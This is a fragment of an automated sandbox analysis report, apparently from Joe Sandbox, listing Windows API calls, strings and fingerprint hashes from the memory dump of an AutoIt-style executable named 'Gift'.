                                                                          • GetClassNameW.USER32(?,?,00000100), ref: 0032B17B
                                                                          • __swprintf.LIBCMT ref: 0032B21C
                                                                          • _wcscmp.LIBCMT ref: 0032B22F
                                                                          • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 0032B284
                                                                          • _wcscmp.LIBCMT ref: 0032B2C0
                                                                          • GetClassNameW.USER32(?,?,00000400), ref: 0032B2F7
                                                                          • GetDlgCtrlID.USER32(?), ref: 0032B349
                                                                          • GetWindowRect.USER32(?,?), ref: 0032B37F
                                                                          • GetParent.USER32(?), ref: 0032B39D
                                                                          • ScreenToClient.USER32(00000000), ref: 0032B3A4
                                                                          • GetClassNameW.USER32(?,?,00000100), ref: 0032B41E
                                                                          • _wcscmp.LIBCMT ref: 0032B432
                                                                          • GetWindowTextW.USER32(?,?,00000400), ref: 0032B458
                                                                          • _wcscmp.LIBCMT ref: 0032B46C
                                                                            • Part of subcall function 002F385C: _iswctype.LIBCMT ref: 002F3864
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
                                                                          • String ID: %s%u
                                                                          • API String ID: 3744389584-679674701
                                                                          • Opcode ID: e8ba49596d343ea6a08cf815df43db955fd5624d0c577fb6b5fe988895b5197e
                                                                          • Instruction ID: 30fcec9c9985c264a5d00e4a3075eeda506482f4a2a806f9e5f66c2b40a352c1
                                                                          • Opcode Fuzzy Hash: e8ba49596d343ea6a08cf815df43db955fd5624d0c577fb6b5fe988895b5197e
                                                                          • Instruction Fuzzy Hash: EFA1F271204326EFD71AEF20D895BAAF7E8FF44350F108529FA99C2191DB30E955CBA1
                                                                          APIs
                                                                          • GetClassNameW.USER32(00000008,?,00000400), ref: 0032BAB1
                                                                          • _wcscmp.LIBCMT ref: 0032BAC2
                                                                          • GetWindowTextW.USER32(00000001,?,00000400), ref: 0032BAEA
                                                                          • CharUpperBuffW.USER32(?,00000000), ref: 0032BB07
                                                                          • _wcscmp.LIBCMT ref: 0032BB25
                                                                          • _wcsstr.LIBCMT ref: 0032BB36
                                                                          • GetClassNameW.USER32(00000018,?,00000400), ref: 0032BB6E
                                                                          • _wcscmp.LIBCMT ref: 0032BB7E
                                                                          • GetWindowTextW.USER32(00000002,?,00000400), ref: 0032BBA5
                                                                          • GetClassNameW.USER32(00000018,?,00000400), ref: 0032BBEE
                                                                          • _wcscmp.LIBCMT ref: 0032BBFE
                                                                          • GetClassNameW.USER32(00000010,?,00000400), ref: 0032BC26
                                                                          • GetWindowRect.USER32(00000004,?), ref: 0032BC8F
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                                          • String ID: @$ThumbnailClass
                                                                          • API String ID: 1788623398-1539354611
                                                                          • Opcode ID: 95c85dc0997bef2688f83033b968027c004382fcd681ffce7363774624647efd
                                                                          • Instruction ID: ab986510f03c3b0fa1e9b0e03c6da517fc185c5605bdae0888ad1dd8f7875801
                                                                          • Opcode Fuzzy Hash: 95c85dc0997bef2688f83033b968027c004382fcd681ffce7363774624647efd
                                                                          • Instruction Fuzzy Hash: 9081CF7100432A9BDB06DF10E885FAAB7ECFF44314F04846AFD898A096DB30DD55CBA1
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: __wcsnicmp
                                                                          • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                                          • API String ID: 1038674560-1810252412
APIs
• LoadIconW.USER32(00000063), ref: 0032CBAA
• SendMessageW.USER32(?,00000080,00000000,00000000), ref: 0032CBBC
• SetWindowTextW.USER32(?,?), ref: 0032CBD3
• GetDlgItem.USER32(?,000003EA), ref: 0032CBE8
• SetWindowTextW.USER32(00000000,?), ref: 0032CBEE
• GetDlgItem.USER32(?,000003E9), ref: 0032CBFE
• SetWindowTextW.USER32(00000000,?), ref: 0032CC04
• SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 0032CC25
• SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 0032CC3F
• GetWindowRect.USER32(?,?), ref: 0032CC48
• SetWindowTextW.USER32(?,?), ref: 0032CCB3
• GetDesktopWindow.USER32 ref: 0032CCB9
• GetWindowRect.USER32(00000000), ref: 0032CCC0
• MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 0032CD0C
• GetClientRect.USER32(?,?), ref: 0032CD19
• PostMessageW.USER32(?,00000005,00000000,00000000), ref: 0032CD3E
• SetTimer.USER32(?,0000040A,00000000,00000000), ref: 0032CD69
Similarity
• API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
• String ID:
• API String ID: 3869813825-0
APIs
• _memset.LIBCMT ref: 0035A87E
• DestroyWindow.USER32(?,?), ref: 0035A8F8
  • Part of subcall function 002E1821: _memmove.LIBCMT ref: 002E185B
• CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 0035A972
• SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 0035A994
• SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0035A9A7
• DestroyWindow.USER32(00000000), ref: 0035A9C9
• CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,002D0000,00000000), ref: 0035AA00
• SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0035AA19
• GetDesktopWindow.USER32 ref: 0035AA32
• GetWindowRect.USER32(00000000), ref: 0035AA39
• SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0035AA51
• SendMessageW.USER32(00000000,00000421,?,00000000), ref: 0035AA69
  • Part of subcall function 002D29AB: GetWindowLongW.USER32(?,000000EB), ref: 002D29BC
Strings
Similarity
• API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
• String ID: 0$tooltips_class32
• API String ID: 1297703922-3619404913
APIs
  • Part of subcall function 002D29E2: GetWindowLongW.USER32(?,000000EB), ref: 002D29F3
• DragQueryPoint.SHELL32(?,?), ref: 0035CCCF
  • Part of subcall function 0035B1A9: ClientToScreen.USER32(?,?), ref: 0035B1D2
  • Part of subcall function 0035B1A9: GetWindowRect.USER32(?,?), ref: 0035B248
  • Part of subcall function 0035B1A9: PtInRect.USER32(?,?,0035C6BC), ref: 0035B258
• SendMessageW.USER32(?,000000B0,?,?), ref: 0035CD38
• DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0035CD43
• DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0035CD66
• _wcscat.LIBCMT ref: 0035CD96
• SendMessageW.USER32(?,000000C2,00000001,?), ref: 0035CDAD
• SendMessageW.USER32(?,000000B0,?,?), ref: 0035CDC6
• SendMessageW.USER32(?,000000B1,?,?), ref: 0035CDDD
• SendMessageW.USER32(?,000000B1,?,?), ref: 0035CDFF
• DragFinish.SHELL32(?), ref: 0035CE06
• DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 0035CEF9
Strings
Similarity
• API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
• String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
• API String ID: 169749273-3440237614
APIs
• VariantInit.OLEAUT32(00000000), ref: 0033831A
• VariantCopy.OLEAUT32(00000000,?), ref: 00338323
• VariantClear.OLEAUT32(00000000), ref: 0033832F
• VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 0033841D
• __swprintf.LIBCMT ref: 0033844D
• VarR8FromDec.OLEAUT32(?,?), ref: 00338479
• VariantInit.OLEAUT32(?), ref: 0033852A
• SysFreeString.OLEAUT32(?), ref: 003385BE
• VariantClear.OLEAUT32(?), ref: 00338618
• VariantClear.OLEAUT32(?), ref: 00338627
• VariantInit.OLEAUT32(00000000), ref: 00338665
Strings
Similarity
• API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem__swprintf
• String ID: %4d%02d%02d%02d%02d%02d$Default
• API String ID: 3730832054-3931177956
APIs
• CharUpperBuffW.USER32(?,?), ref: 00354A61
• SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00354AAC
Strings
Similarity
• API ID: BuffCharMessageSendUpper
• String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
• API String ID: 3974292440-4258414348
APIs
• GetLocalTime.KERNEL32(?), ref: 0033E31F
• SystemTimeToFileTime.KERNEL32(?,?), ref: 0033E32F
• LocalFileTimeToFileTime.KERNEL32(?,?), ref: 0033E33B
• __wsplitpath.LIBCMT ref: 0033E399
• _wcscat.LIBCMT ref: 0033E3B1
• _wcscat.LIBCMT ref: 0033E3C3
• GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 0033E3D8
• SetCurrentDirectoryW.KERNEL32(?), ref: 0033E3EC
• SetCurrentDirectoryW.KERNEL32(?), ref: 0033E41E
• SetCurrentDirectoryW.KERNEL32(?), ref: 0033E43F
• _wcscpy.LIBCMT ref: 0033E44B
• SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 0033E48A
Strings
Similarity
• API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
• String ID: *.*
• API String ID: 3566783562-438819550
APIs
  • Part of subcall function 002D1F1D: InvalidateRect.USER32(?,00000000,00000001,?,?,?,002D2412,?,00000000,?,?,?,?,002D1AA7,00000000,?), ref: 002D1F76
• DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 002D24AF
• KillTimer.USER32(-00000001,?,?,?,?,002D1AA7,00000000,?,?,002D1EBE,?,?), ref: 002D254A
• DestroyAcceleratorTable.USER32(00000000), ref: 0030BFE7
• ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,002D1AA7,00000000,?,?,002D1EBE,?,?), ref: 0030C018
• ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,002D1AA7,00000000,?,?,002D1EBE,?,?), ref: 0030C02F
• ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,002D1AA7,00000000,?,?,002D1EBE,?,?), ref: 0030C04B
• DeleteObject.GDI32(00000000), ref: 0030C05D
Strings
Similarity
• API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
• String ID: h6
• API String ID: 641708696-2818403674
APIs
• LoadStringW.USER32(00000066,?,00000FFF,?), ref: 0033A2C2
  • Part of subcall function 002E1A36: _memmove.LIBCMT ref: 002E1A77
• LoadStringW.USER32(00000072,?,00000FFF,?), ref: 0033A2E3
• __swprintf.LIBCMT ref: 0033A33C
• __swprintf.LIBCMT ref: 0033A355
• _wprintf.LIBCMT ref: 0033A3FC
• _wprintf.LIBCMT ref: 0033A41A
Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: LoadString__swprintf_wprintf$_memmove
                                                                          • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                                                                          • API String ID: 311963372-3080491070
                                                                          • Opcode ID: d4bd4022e043ce3c9b2dcff6812e63fcf3f603920c33afcbda7f6989c6219014
                                                                          • Instruction ID: 1bccf53cf8b4f319b3d63096fa10cdb3eb798a3824231ac9285534b0e1aacea8
                                                                          • Opcode Fuzzy Hash: d4bd4022e043ce3c9b2dcff6812e63fcf3f603920c33afcbda7f6989c6219014
                                                                          • Instruction Fuzzy Hash: 5051EE31950609AACF16EBE1CD86EEEB779AF04340F600566F505B2192EB352F78CF61
                                                                          APIs
                                                                          • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000000,00000001,00000000,?,0031F8B8,00000001,0000138C,00000001,00000000,00000001,?,00343FF9,00000000), ref: 0033009A
                                                                          • LoadStringW.USER32(00000000,?,0031F8B8,00000001), ref: 003300A3
                                                                            • Part of subcall function 002E1A36: _memmove.LIBCMT ref: 002E1A77
                                                                          • GetModuleHandleW.KERNEL32(00000000,00397310,?,00000FFF,?,?,0031F8B8,00000001,0000138C,00000001,00000000,00000001,?,00343FF9,00000000,00000001), ref: 003300C5
                                                                          • LoadStringW.USER32(00000000,?,0031F8B8,00000001), ref: 003300C8
                                                                          • __swprintf.LIBCMT ref: 00330118
                                                                          • __swprintf.LIBCMT ref: 00330129
                                                                          • _wprintf.LIBCMT ref: 003301D2
                                                                          • MessageBoxW.USER32(00000000,?,?,00011010), ref: 003301E9
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
                                                                          • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                          • API String ID: 984253442-2268648507
                                                                          • Opcode ID: dcc172907e49092d6cb24335e3f5f5ea4729b0515f20087a243da76f607d4d55
                                                                          • Instruction ID: 97c24cd040be35e912048373eefa5ea10a140ce60c9393be495edc6a8bef6476
                                                                          • Opcode Fuzzy Hash: dcc172907e49092d6cb24335e3f5f5ea4729b0515f20087a243da76f607d4d55
                                                                          • Instruction Fuzzy Hash: B7415B72840259AACB15EBE1CD96DEEB37DAF14340F900565F605A2092EB356F28CF61
                                                                          APIs
                                                                            • Part of subcall function 002D4D37: __itow.LIBCMT ref: 002D4D62
                                                                            • Part of subcall function 002D4D37: __swprintf.LIBCMT ref: 002D4DAC
                                                                          • CharLowerBuffW.USER32(?,?), ref: 0033AA0E
                                                                          • GetDriveTypeW.KERNEL32 ref: 0033AA5B
                                                                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0033AAA3
                                                                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0033AADA
                                                                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0033AB08
                                                                            • Part of subcall function 002E1821: _memmove.LIBCMT ref: 002E185B
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                                                                          • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                          • API String ID: 2698844021-4113822522
                                                                          • Opcode ID: 9421241c58756295eff24cc2a882a2e4f3446184057dddcb3b68f680e5425a49
                                                                          • Instruction ID: fee55f8048fd83667151ea121b5984ec14a63b8943d8aa49ebeffa68712e6423
                                                                          • Opcode Fuzzy Hash: 9421241c58756295eff24cc2a882a2e4f3446184057dddcb3b68f680e5425a49
                                                                          • Instruction Fuzzy Hash: BC519A711143059FC701EF21C88186AB3F9FF88758F50896DF896972A2DB31AE19CF92
                                                                          APIs
                                                                          • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0033A852
                                                                          • __swprintf.LIBCMT ref: 0033A874
                                                                          • CreateDirectoryW.KERNEL32(?,00000000), ref: 0033A8B1
                                                                          • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 0033A8D6
                                                                          • _memset.LIBCMT ref: 0033A8F5
                                                                          • _wcsncpy.LIBCMT ref: 0033A931
                                                                          • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 0033A966
                                                                          • CloseHandle.KERNEL32(00000000), ref: 0033A971
                                                                          • RemoveDirectoryW.KERNEL32(?), ref: 0033A97A
                                                                          • CloseHandle.KERNEL32(00000000), ref: 0033A984
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                                          • String ID: :$\$\??\%s
                                                                          • API String ID: 2733774712-3457252023
                                                                          • Opcode ID: 4479927b1b7394dda3ecc21b97af96fc84f0aa1c46bb3e2be0d24454ebb1e20e
                                                                          • Instruction ID: ee691412b881f15c7e59acf5e28458fb4083f9ef67578c0bdd0a803ca9fac153
                                                                          • Opcode Fuzzy Hash: 4479927b1b7394dda3ecc21b97af96fc84f0aa1c46bb3e2be0d24454ebb1e20e
                                                                          • Instruction Fuzzy Hash: E231D27151020AABDB229FA0DC89FEB77BCEF89701F1141B6F608D6160E7B096448B24
                                                                          APIs
                                                                          • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,0035982C,?,?), ref: 0035C0C8
                                                                          • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,0035982C,?,?,00000000,?), ref: 0035C0DF
                                                                          • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,0035982C,?,?,00000000,?), ref: 0035C0EA
                                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,0035982C,?,?,00000000,?), ref: 0035C0F7
                                                                          • GlobalLock.KERNEL32(00000000,?,?,?,?,0035982C,?,?,00000000,?), ref: 0035C100
                                                                          • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,0035982C,?,?,00000000,?), ref: 0035C10F
                                                                          • GlobalUnlock.KERNEL32(00000000,?,?,?,?,0035982C,?,?,00000000,?), ref: 0035C118
                                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,0035982C,?,?,00000000,?), ref: 0035C11F
                                                                          • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,0035982C,?,?,00000000,?), ref: 0035C130
                                                                          • OleLoadPicture.OLEAUT32(?,00000000,00000000,00363C7C,?), ref: 0035C149
                                                                          • GlobalFree.KERNEL32(00000000), ref: 0035C159
                                                                          • GetObjectW.GDI32(00000000,00000018,?), ref: 0035C17D
                                                                          • CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 0035C1A8
                                                                          • DeleteObject.GDI32(00000000), ref: 0035C1D0
                                                                          • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 0035C1E6
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                          • String ID:
                                                                          • API String ID: 3840717409-0
                                                                          • Opcode ID: 258dad1271639b56babddd3f4a92a4227c45c2bf37e6bc004e566d0a9a5cd544
                                                                          • Instruction ID: 445e14918b22752338aa7efe912d979fc655f1ee3e21bc3d9b251a4c20f22556
                                                                          • Opcode Fuzzy Hash: 258dad1271639b56babddd3f4a92a4227c45c2bf37e6bc004e566d0a9a5cd544
                                                                          • Instruction Fuzzy Hash: 2F415C75500204EFCB268F65CC49EAB7BBCEF89716F118058FD06D72A0CBB09940CB60
                                                                          APIs
                                                                            • Part of subcall function 002D29E2: GetWindowLongW.USER32(?,000000EB), ref: 002D29F3
                                                                          • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 0035C8A4
                                                                          • GetFocus.USER32 ref: 0035C8B4
                                                                          • GetDlgCtrlID.USER32(00000000), ref: 0035C8BF
                                                                          • _memset.LIBCMT ref: 0035C9EA
                                                                          • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 0035CA15
                                                                          • GetMenuItemCount.USER32(?), ref: 0035CA35
                                                                          • GetMenuItemID.USER32(?,00000000), ref: 0035CA48
                                                                          • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 0035CA7C
                                                                          • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 0035CAC4
                                                                          • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0035CAFC
                                                                          • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 0035CB31
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                                                          • String ID: 0
                                                                          • API String ID: 1296962147-4108050209
                                                                          • Opcode ID: a17bc8876b6cfe8610c601979494517950d6e002567e04eeb35741b96ab22762
                                                                          • Instruction ID: 40c2a1f57dbdd2ead2e7529b8401b672227eb87dd6b3afbfcd10ae0e292691f7
                                                                          • Opcode Fuzzy Hash: a17bc8876b6cfe8610c601979494517950d6e002567e04eeb35741b96ab22762
                                                                          • Instruction Fuzzy Hash: 2D818D702183059FDB12CF14C885E6BBBE8FB88759F01552EFD95972A1C770D909CBA2
                                                                          APIs
                                                                            • Part of subcall function 00328E20: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00328E3C
                                                                            • Part of subcall function 00328E20: GetLastError.KERNEL32(?,00328900,?,?,?), ref: 00328E46
                                                                            • Part of subcall function 00328E20: GetProcessHeap.KERNEL32(00000008,?,?,00328900,?,?,?), ref: 00328E55
                                                                            • Part of subcall function 00328E20: HeapAlloc.KERNEL32(00000000,?,00328900,?,?,?), ref: 00328E5C
                                                                            • Part of subcall function 00328E20: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00328E73
                                                                            • Part of subcall function 00328EBD: GetProcessHeap.KERNEL32(00000008,00328916,00000000,00000000,?,00328916,?), ref: 00328EC9
                                                                            • Part of subcall function 00328EBD: HeapAlloc.KERNEL32(00000000,?,00328916,?), ref: 00328ED0
                                                                            • Part of subcall function 00328EBD: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00328916,?), ref: 00328EE1
                                                                          • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00328B2E
                                                                          • _memset.LIBCMT ref: 00328B43
                                                                          • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00328B62
                                                                          • GetLengthSid.ADVAPI32(?), ref: 00328B73
                                                                          • GetAce.ADVAPI32(?,00000000,?), ref: 00328BB0
                                                                          • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00328BCC
                                                                          • GetLengthSid.ADVAPI32(?), ref: 00328BE9
                                                                          • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00328BF8
                                                                          • HeapAlloc.KERNEL32(00000000), ref: 00328BFF
                                                                          • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00328C20
                                                                          • CopySid.ADVAPI32(00000000), ref: 00328C27
                                                                          • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00328C58
                                                                          • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00328C7E
                                                                          • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00328C92
                                                                          Memory Dump Source
